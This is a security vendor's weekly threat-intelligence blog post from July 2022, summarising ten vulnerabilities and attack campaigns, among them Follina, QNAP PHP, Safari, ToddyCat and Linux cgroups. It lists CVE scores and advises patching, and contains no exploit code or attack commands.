Ransomware Q2 & Q3 Report is live now!

CSW Weekly Threat Intelligence

Posted on Jul 1, 2022 | By Pavithra Shankar

CSW’s weekly threat intelligence edition brings to you early warnings about critical vulnerabilities that could potentially be weaponized and prove dangerous to your organization and its assets. 

All CVEs mentioned in this blog edition have received a maximum rating from the Threat Intelligence platform indicating high probability of exploitation. We urge organizations to prioritize these warnings and proactively patch these vulnerabilities.

Check out our Podcast on Top 3 Threats of the Week!

Top Critical Cyber Threats of the Week

  1. Russia’s APT28 Launches Follina Exploit Campaign in Ukraine 

  2. Critical PHP Flaw Opens QNAP NAS devices to RCE attacks

  3. CVE-2022-22620: Apple’s Safari Zombie Zero-Day Fixed!

  4. New ToddyCat APT Gang Hacks Microsoft Exchange Servers

  5. Adobe Illustrator Patches Multiple Zero-Day Vulnerabilities

  6. Avos Ransomware Group Develops New Attack Methods

  7. RIG Exploit Kit Infects Victim’s PCs With Dridex

  8. PoC Now Available for VMware Vulnerability (CVE-2022-22980)

  9. Siemens' Industrial Network Management System Fixed 15 Vulnerabilities

  10. Privilege Escalation Vulnerability in Linux kernel

Russia’s APT28 Launches Follina Exploit Campaign in Ukraine  

APT28, a notorious advanced persistent threat group from Russia, is the latest attacker to attempt to exploit the Follina vulnerability in the Microsoft Support Diagnostic Tool (MSDT). The threat actor - aka Fancy Bear and Sofacy - has been observed this week sending out phishing emails to Ukrainian users that contain a malicious document containing an exploit for the now-patched vulnerability (CVE-2022-30190). The document was titled "Nuclear Terrorism A Very Real Threat.rtf" and appeared to be an attempt to exploit fears that the conflict in Ukraine would spiral into a nuclear holocaust. 

Threat Associated CVEs: CVE-2022-30190

CVSS Score: 7.8

Affected Product Count: 18

Exploit Type: RCE 

CWE: NVD-CWE-noinfo

Ransomware Associations: NA

APT Groups: TA413, APT28, and TA570 

Malware: QBot, Sandworm, and AsyncRAT

CISA KEV: Yes

CISA Patch Deadline: June 6, 2022

Patch: Download

Critical PHP Flaw Opens QNAP NAS devices to RCE attacks

QNAP has warned customers today that some of its Network Attached Storage (NAS) devices (with non-default configurations) may be vulnerable to attacks exploiting a three-year-old critical PHP vulnerability. The vendor has already patched the security flaw (CVE-2019-11043) for the affected operating systems (QTS 5.0.1.2034 build 20220515 or later, and QuTS hero h5.0.0.2069 build 20220614 or later). 

Threat Associated CVEs: CVE-2019-11043

CVSS Score: 9.8

Affected Product Counts: 11

Exploit Type: ['RCE', 'PE', 'WebApp', 'DoS']

CWE: CWE-787|CWE-120

Ransomware Associations: NextCry

APT Groups: NA

Malware: NA

CISA KEV: Yes

CISA Patch Deadline: April 15, 2022

Patch: Download

CVE-2022-22620: Apple’s Safari Zombie Zero-Day Fixed!

A Google project researcher described the vulnerability as a "zombie" Safari zero-day (CVE-2022-22620) which came back from the dead, was found and exploited in the wild. Originally patched in 2013, the flaw reappeared in December 2016, according to Google Project Zero. It can be exploited by processing maliciously crafted web content. Considering the exploitation, CISA added this CVE to its catalog.

Threat Associated CVEs: CVE-2022-22620

CVSS Score: 8.8

Affected Product Counts: 4

Exploit Type: NA

CWE: CWE-416

Ransomware Associations: NA

APT Groups: NA

Malware: NA

CISA KEV: Yes

CISA Patch Deadline: February 25, 2022

Patch: Download

New ToddyCat APT Gang Hacks Microsoft Exchange Servers

The ToddyCat advanced persistent threat group has been targeting Microsoft Exchange servers throughout Asia and Europe for more than a year, since at least December 2020.

Researchers found a previously unknown passive backdoor they called Samurai, and a new trojan malware they named Ninja Trojan, while tracking the group's activity. With both malware strains, attackers can control infected systems, and move laterally in networks. 

The hacking group exploited Microsoft Exchange ProxyLogon vulnerabilities at the time to execute remote code on vulnerable servers in order to deploy the China Chopper web shells.

Adobe Illustrator Patches Multiple Zero-Day Vulnerabilities

On June 14, 2022, Adobe released a security patch that fixed five vulnerabilities, identified as CVE-2022-30649, CVE-2022-30666, CVE-2022-30667, CVE-2022-30668, and CVE-2022-30669. These vulnerabilities have different root causes related to two Illustrator plugins. Users of Adobe Illustrator 2022, versions 26.0.2 and earlier, and users of Adobe Illustrator 2021, versions 25.4.5, and earlier are affected.

 

Avos Ransomware Group Develops New Attack Methods

Researchers have discovered AvosLocker's new campaign to hunt for exposed networks. Attackers used a variety of tools, including Sliver, Cobalt Strike, and several commercially available network scanners. Initially, this incident was triggered by a pair of VMWare Horizon Unified Access Gateways that were vulnerable to Log4Shell. 


RIG Exploit Kit Infects Victim’s PCs With Dridex

A few months ago, the cybercriminals behind the RIG Exploit Kit traded out the credential-stealing Trojan Raccoon Stealer after their lead developer was killed in the Russian invasion of Ukraine. Cyberattackers behind the RIG Exploit Kit were able to quickly replace the notorious financial Trojan Dridex, which is capable of keylogging and screenshot theft, with the tried-and-true RIG Exploit Kit. 

PoC Now Available for VMware Vulnerability (CVE-2022-22980)

VMware released a security bulletin revealing a high-severity SpEL Expression injection vulnerability (CVE-2022-22980) in Spring Data MongoDB. This vulnerability affects Spring Data MongoDB applications using repository query methods annotated with @Query or @Aggregate and using parameterized SpEL statements. In order to perform particular exploits, non-sanitized input must be used for repository queries. 

Threat Associated CVEs: CVE-2022-22980

CVSS Score: NA

Exploit Type: NA

CWE: NA

Ransomware Associations: NA

APT Groups: NA

Malware: NA

Patch: Download

Siemens' Industrial Network Management System Fixed 15 Vulnerabilities

Siemens SINEC has disclosed details about 15 security flaws in its network management system (NMS), some of which could be exploited by an attacker to achieve remote code execution on affected systems.

Privilege Escalation Vulnerability in Linux Kernel

Linux disclosed CVE-2022-0492, a new kernel privilege escalation vulnerability on Feb 4, 2022. The CVE-2022-0492 vulnerability affects control groups, a Linux component that is the basis of containers. This is one of the easiest Linux privilege escalations discovered in recent history that exposes a privileged operation to non-privileged users by mistake.

Threat Associated CVEs: CVE-2022-0492

CVSS Score: 7.8

Affected Product Count: 43

Exploit Type: NA

CWE: CWE-287

Ransomware Associations: NA

APT Groups: NA

Malware: NA

CISA KEV: Yes

Patch: Download

 

CSW is on a mission to fix the biggest gap in the cybersecurity industry! 

Get early warning alerts from our Threat Intelligence team and proactively patch!

Leverage our expertise and manage your threats on a continuous basis to stay safe from attackers.

 

Talk to Us | Schedule a Consultation

 Our Services

Vulnerability Management | Penetration Testing 

 Attack Surface Management | Cloud Security

Never miss a patch or an update with CSW’s Patch Watch Newsletter. Subscribe now!

csw

Secure your environment from cyber-attacks!

Know How

incognito